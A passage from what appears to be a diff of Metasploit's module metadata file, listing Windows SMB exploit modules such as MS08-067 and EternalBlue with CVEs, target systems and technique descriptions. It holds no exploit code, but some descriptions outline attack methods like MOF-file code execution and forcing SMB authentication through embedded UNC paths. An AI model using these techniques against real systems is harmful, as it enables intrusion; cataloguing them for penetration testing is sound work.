the service is hosted inside svchost.exe, a failed\n exploit attempt can cause other system services to fail as well. A valid\n username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.", - "references": [ - "CVE-2006-2370", - "OSVDB-26437", - "BID-18325", - "MSB-MS06-025" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "Windows 2000 SP4", - "Windows XP SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_025_rras.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_025_rras", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_040_netapi": { - "name": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow", - "fullname": "exploit/windows/smb/ms06_040_netapi", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-08-08", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.", - "references": [ - "CVE-2006-3439", - "OSVDB-27845", - "BID-19409", - "MSB-MS06-040" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)", - "(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4", - "(wcscpy) Windows XP SP0/SP1", - "(stack) Windows XP SP1 English", - "(stack) Windows XP SP1 Italian", - "(wcscpy) Windows 2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_040_netapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "crash-os-restarts", - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_066_nwapi": { - "name": "MS06-066 Microsoft Services nwapi32.dll Module Exploit", - "fullname": "exploit/windows/smb/ms06_066_nwapi", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.", - "references": [ - "CVE-2006-4688", - "OSVDB-30260", - "BID-21023", - "MSB-MS06-066" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_066_nwapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_066_nwapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_066_nwwks": { - "name": "MS06-066 Microsoft Services nwwks.dll Module Exploit", - "fullname": "exploit/windows/smb/ms06_066_nwwks", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack buffer overflow in the svchost service, when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.", - "references": [ - "CVE-2006-4688", - "OSVDB-30260", - "BID-21023", - "MSB-MS06-066" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_066_nwwks.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_066_nwwks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_070_wkssvc": { - "name": "MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow", - "fullname": "exploit/windows/smb/ms06_070_wkssvc", - "aliases": [], - "rank": 0, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n In order to exploit this vulnerability, you must specify the name of a\n valid Windows DOMAIN. It may be possible to satisfy this condition by using\n a custom DNS and LDAP setup, however that method is not covered here.\n\n Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n credentials are required to reach the vulnerable code. Windows XP SP1 only\n requires valid user credentials. Also, testing shows that a machine already\n joined to a domain is not exploitable.", - "references": [ - "CVE-2006-4691", - "OSVDB-30263", - "BID-20985", - "MSB-MS06-070" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targetting", - "Windows 2000 SP4", - "Windows XP SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_070_wkssvc.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_070_wkssvc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms07_029_msdns_zonename": { - "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)", - "fullname": "exploit/windows/smb/ms07_029_msdns_zonename", - "aliases": [], - "rank": 0, - "disclosure_date": "2007-04-12", - "type": "exploit", - "author": [ - "hdm ", - "Unknown", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2. This module exploits the\n RPC service using the \\DNSSERVER pipe available via SMB. This\n pipe requires a valid user account to access, so the SMBUSER\n and SMBPASS options must be specified.", - "references": [ - "CVE-2007-1748", - "OSVDB-34100", - "MSB-MS07-029" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", - "Windows 2000 Server SP0-SP4+ English", - "Windows 2000 Server SP0-SP4+ French", - "Windows 2000 Server SP0-SP4+ German", - "Windows 2000 Server SP0-SP4+ Italian", - "Windows 2000 Server SP0-SP4+ Polish", - "Windows 2000 Server SP0-SP4+ Portuguese", - "Windows 2000 Server SP0-SP4+ Korean", - "Windows 2000 Server SP0-SP4+ Russian", - "Windows 2000 Server SP0-SP4+ Simplified Chinese", - "Windows 2000 Server SP0-SP4+ Spanish", - "Windows 2000 Server SP0-SP4+ Swedish", - "Windows 2000 Server SP0-SP4+ Traditional Chinese", - "Windows 2000 Server SP0-SP4+ Turkish", - "Windows 2003 Server SP0 English", - "Windows 2003 Server SP0 French", - "Windows 2003 Server SP1-SP2 English", - "Windows 2003 Server SP1-SP2 French", - "Windows 2003 Server SP1-SP2 Spanish", - "Windows 2003 Server SP1-SP2 Italian", - "Windows 2003 Server SP1-SP2 German", - "Windows 2003 Server SP1-SP2 Russian", - "Windows 2003 Server SP1-SP2 Simplified Chinese" - ], - "mod_time": "2021-11-30 07:38:08 +0000", - "path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms07_029_msdns_zonename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms08_067_netapi": { - "name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption", - "fullname": "exploit/windows/smb/ms08_067_netapi", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-10-28", - "type": "exploit", - "author": [ - "hdm ", - "Brett Moore ", - "frank2 ", - "jduck " - ], - "description": "This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.", - "references": [ - "CVE-2008-4250", - "OSVDB-49243", - "MSB-MS08-067", - "URL-https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targeting", - "Windows 2000 Universal", - "Windows XP SP0/SP1 Universal", - "Windows 2003 SP0 Universal", - "Windows XP SP2 English (AlwaysOn NX)", - "Windows XP SP2 English (NX)", - "Windows XP SP3 English (AlwaysOn NX)", - "Windows XP SP3 English (NX)", - "Windows XP SP2 Arabic (NX)", - "Windows XP SP2 Chinese - Traditional / Taiwan (NX)", - "Windows XP SP2 Chinese - Simplified (NX)", - "Windows XP SP2 Chinese - Traditional (NX)", - "Windows XP SP2 Czech (NX)", - "Windows XP SP2 Danish (NX)", - "Windows XP SP2 German (NX)", - "Windows XP SP2 Greek (NX)", - "Windows XP SP2 Spanish (NX)", - "Windows XP SP2 Finnish (NX)", - "Windows XP SP2 French (NX)", - "Windows XP SP2 Hebrew (NX)", - "Windows XP SP2 Hungarian (NX)", - "Windows XP SP2 Italian (NX)", - "Windows XP SP2 Japanese (NX)", - "Windows XP SP2 Korean (NX)", - "Windows XP SP2 Dutch (NX)", - "Windows XP SP2 Norwegian (NX)", - "Windows XP SP2 Polish (NX)", - "Windows XP SP2 Portuguese - Brazilian (NX)", - "Windows XP SP2 Portuguese (NX)", - "Windows XP SP2 Russian (NX)", - "Windows XP SP2 Swedish (NX)", - "Windows XP SP2 Turkish (NX)", - "Windows XP SP3 Arabic (NX)", - "Windows XP SP3 Chinese - Traditional / Taiwan (NX)", - "Windows XP SP3 Chinese - Simplified (NX)", - "Windows XP SP3 Chinese - Traditional (NX)", - "Windows XP SP3 Czech (NX)", - "Windows XP SP3 Danish (NX)", - "Windows XP SP3 German (NX)", - "Windows XP SP3 Greek (NX)", - "Windows XP SP3 Spanish (NX)", - "Windows XP SP3 Finnish (NX)", - "Windows XP SP3 French (NX)", - "Windows XP SP3 Hebrew (NX)", - "Windows XP SP3 Hungarian (NX)", - "Windows XP SP3 Italian (NX)", - "Windows XP SP3 Japanese (NX)", - "Windows XP SP3 Korean (NX)", - "Windows XP SP3 Dutch (NX)", - "Windows XP SP3 Norwegian (NX)", - "Windows XP SP3 Polish (NX)", - "Windows XP SP3 Portuguese - Brazilian (NX)", - "Windows XP SP3 Portuguese (NX)", - "Windows XP SP3 Russian (NX)", - "Windows XP SP3 Swedish (NX)", - "Windows XP SP3 Turkish (NX)", - "Windows 2003 SP1 English (NO NX)", - "Windows 2003 SP1 English (NX)", - "Windows 2003 SP1 Japanese (NO NX)", - "Windows 2003 SP1 Spanish (NO NX)", - "Windows 2003 SP1 Spanish (NX)", - "Windows 2003 SP1 French (NO NX)", - "Windows 2003 SP1 French (NX)", - "Windows 2003 SP2 English (NO NX)", - "Windows 2003 SP2 English (NX)", - "Windows 2003 SP2 German (NO NX)", - "Windows 2003 SP2 German (NX)", - "Windows 2003 SP2 Portuguese (NX)", - "Windows 2003 SP2 Portuguese - Brazilian (NX)", - "Windows 2003 SP2 Spanish (NO NX)", - "Windows 2003 SP2 Spanish (NX)", - "Windows 2003 SP2 Japanese (NO NX)", - "Windows 2003 SP2 French (NO NX)", - "Windows 2003 SP2 French (NX)", - "Windows 2003 SP2 Chinese - Simplified (NX)", - "Windows 2003 SP2 Czech (NX)", - "Windows 2003 SP2 Dutch (NX)", - "Windows 2003 SP2 Hungarian (NX)", - "Windows 2003 SP2 Italian (NX)", - "Windows 2003 SP2 Russian (NX)", - "Windows 2003 SP2 Swedish (NX)", - "Windows 2003 SP2 Turkish (NX)" - ], - "mod_time": "2023-07-10 16:54:42 +0000", - "path": "/modules/exploits/windows/smb/ms08_067_netapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms08_067_netapi", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms09_050_smb2_negotiate_func_index": { - "name": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", - "fullname": "exploit/windows/smb/ms09_050_smb2_negotiate_func_index", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-09-07", - "type": "exploit", - "author": [ - "Laurent Gaffie ", - "hdm ", - "sf " - ], - "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.", - "references": [ - "MSB-MS09-050", - "CVE-2009-3103", - "BID-36299", - "OSVDB-57799", - "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows Vista SP1/SP2 and Server 2008 (x86)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms10_046_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/smb/ms10_046_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-07-16", - "type": "exploit", - "author": [ - "hdm ", - "jduck ", - "B_H" - ], - "description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.", - "references": [ - "CVE-2010-2568", - "OSVDB-66387", - "MSB-MS10-046", - "URL-https://github.com/rapid7/metasploit-framework/pull/4911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms10_046_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms10_061_spoolss": { - "name": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability", - "fullname": "exploit/windows/smb/ms10_061_spoolss", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-09-14", - "type": "exploit", - "author": [ - "jduck ", - "hdm " - ], - "description": "This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)\n is periodically scanned and any new .mof files are processed automatically. This is\n the same technique employed by the Stuxnet code found in the wild.", - "references": [ - "OSVDB-67988", - "CVE-2010-2729", - "MSB-MS10-061" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2025-04-04 11:55:57 +0000", - "path": "/modules/exploits/windows/smb/ms10_061_spoolss.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms10_061_spoolss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms15_020_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/smb/ms15_020_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-10", - "type": "exploit", - "author": [ - "Michael Heerklotz", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This creates an SMB resource to provide the payload and the trigger, and generates a\n LNK file which must be sent to the target. This module has been tested successfully on\n Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", - "references": [ - "CVE-2015-0096", - "MSB-MS15-020", - "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", - "URL-https://github.com/rapid7/metasploit-framework/pull/4911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms15_020_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms17_010_eternalblue": { - "name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", - "fullname": "exploit/windows/smb/ms17_010_eternalblue", - "aliases": [ - "exploit/windows/smb/ms17_010_eternalblue_win8" - ], - "rank": 200, - "disclosure_date": "2017-03-14", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "sleepya", - "Sean Dillon ", - "Dylan Davis ", - "thelightcosine", - "wvu ", - "agalway-r7", - "cdelafuente-r7", - "cdelafuente-r7", - "agalway-r7" - ], - "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0144", - "CVE-2017-0145", - "CVE-2017-0146", - "CVE-2017-0147", - "CVE-2017-0148", - "URL-https://github.com/RiskSense-Ops/MS17-010", - "URL-https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf", - "EDB-42030" - ], - "platform": "Windows", - "arch": "x64", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Target", - "Windows 7", - "Windows Embedded Standard 7", - "Windows Server 2008 R2", - "Windows 8", - "Windows 8.1", - "Windows Server 2012", - "Windows 10 Pro", - "Windows 10 Enterprise Evaluation" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms17_010_eternalblue", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ETERNALBLUE" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms17_010_psexec": { - "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", - "fullname": "exploit/windows/smb/ms17_010_psexec", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-14", - "type": "exploit", - "author": [ - "sleepya", - "zerosum0x0", - "Shadow Brokers", - "Equation Group" - ], - "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0146", - "CVE-2017-0147", - "URL-https://github.com/worawit/MS17-010", - "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", - "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "PowerShell", - "Native upload", - "MOF upload" - ], - "mod_time": "2021-06-03 11:43:09 +0000", - "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms17_010_psexec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "ETERNALSYNERGY", - "ETERNALROMANCE", - "ETERNALCHAMPION", - "ETERNALBLUE" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/netidentity_xtierrpcpipe": { - "name": "Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow", - "fullname": "exploit/windows/smb/netidentity_xtierrpcpipe", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-04-06", - "type": "exploit", - "author": [ - "MC ", - "Ruben Santamarta" - ], - "description": "This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending\n a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n able to execute arbitrary code. The success of this module is much greater once the\n service has been restarted.", - "references": [ - "CVE-2009-1350", - "OSVDB-53351", - "BID-34400", - "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 / Windows XP / Windows 2003" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb", - "is_install_path": true, - "ref_name": "windows/smb/netidentity_xtierrpcpipe", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/psexec": { - "name": "Microsoft Windows Authenticated User Code Execution", - "fullname": "exploit/windows/smb/psexec", - "aliases": [], - "rank": 0, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "hdm ", - "Royce Davis ", - "RageLtMan " - ], - "description": "This module uses a valid administrator username and password (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" utility provided by SysInternals. This module is now able\n to clean up after itself. The service created by this tool uses a randomly\n chosen name and description.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106", - "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx", - "URL-https://www.optiv.com/blog/owning-computers-without-shell-access", - "URL-http://sourceforge.net/projects/smbexec/" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "PowerShell", - "Native upload", - "MOF upload", - "Command" - ], - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/exploits/windows/smb/psexec.rb", - "is_install_path": true, - "ref_name": "windows/smb/psexec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/smb/smb_delivery": { - "name": "SMB Delivery", - "fullname": "exploit/windows/smb/smb_delivery", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-07-26", - "type": "exploit", - "author": [ - "Andrew Smith", - "Russel Van Tuyl" - ], - "description": "This module serves payloads via an SMB server and provides commands to retrieve\n and execute the generated payloads. Currently supports DLLs and Powershell.", - "references": [ - "URL-https://github.com/rapid7/metasploit-framework/pull/3074" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DLL", - "PSH" - ], - "mod_time": "2022-05-11 12:40:43 +0000", - "path": "/modules/exploits/windows/smb/smb_delivery.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_delivery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/smb_doublepulsar_rce": { - "name": "SMB DOUBLEPULSAR Remote Code Execution", - "fullname": "exploit/windows/smb/smb_doublepulsar_rce", - "aliases": [ - "exploit/windows/smb/doublepulsar_rce" - ], - "rank": 500, - "disclosure_date": "2017-04-14", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "zerosum0x0", - "Luke Jennings", - "wvu ", - "Jacob Robles" - ], - "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0144", - "CVE-2017-0145", - "CVE-2017-0146", - "CVE-2017-0147", - "CVE-2017-0148", - "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", - "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", - "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", - "URL-https://github.com/countercept/doublepulsar-detection-script", - "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1" - ], - "platform": "Windows", - "arch": "x64", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Execute payload (x64)", - "Neutralize implant" - ], - "mod_time": "2023-09-15 16:40:22 +0000", - "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_doublepulsar_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "DOUBLEPULSAR" - ], - "RelatedModules": [ - "auxiliary/scanner/smb/smb_ms17_010", - "exploit/windows/smb/ms17_010_eternalblue" - ], - "Stability": [ - "crash-os-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/smb_relay": { - "name": "MS08-068 Microsoft Windows SMB Relay Code Execution", - "fullname": "exploit/windows/smb/smb_relay", - "aliases": [], - "rank": 600, - "disclosure_date": "2001-03-31", - "type": "exploit", - "author": [ - "hdm ", - "juan vazquez ", - "agalway-r7", - "alanfoster", - "Spencer McIntyre" - ], - "description": "This module will relay SMB authentication requests to another\n host, gaining access to an authenticated SMB session if successful.\n If the connecting user is an administrator and network logins are\n allowed to the target machine, this module will execute an arbitrary\n payload. To exploit this, the target system\tmust try to\tauthenticate\n to this module. The easiest way to force a SMB authentication attempt\n is by embedding a UNC path (\\SERVER\\SHARE) into a web page or\n email message. When the victim views the web page or email, their\n system will automatically connect to the server specified in the UNC\n share (the IP address of the system running this module) and attempt\n to authenticate. Unfortunately, this\n module is not able to clean up after itself. The service and payload\n file listed in the output will need to be manually removed after access\n has been gained. The service created by this tool uses a randomly chosen\n name and description, so the services list can become cluttered after\n repeated exploitation.\n\n The SMB authentication relay attack was first reported by Sir Dystic on\n March 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n includes a patch which prevents the relaying of challenge keys back to\n the host which issued them, preventing this exploit from working in\n the default configuration. It is still possible to set the SMBHOST\n parameter to a third-party host that the victim is authorized to access,\n but the \"reflection\" attack has been effectively broken.\n\n As of Feb 2022 - this module 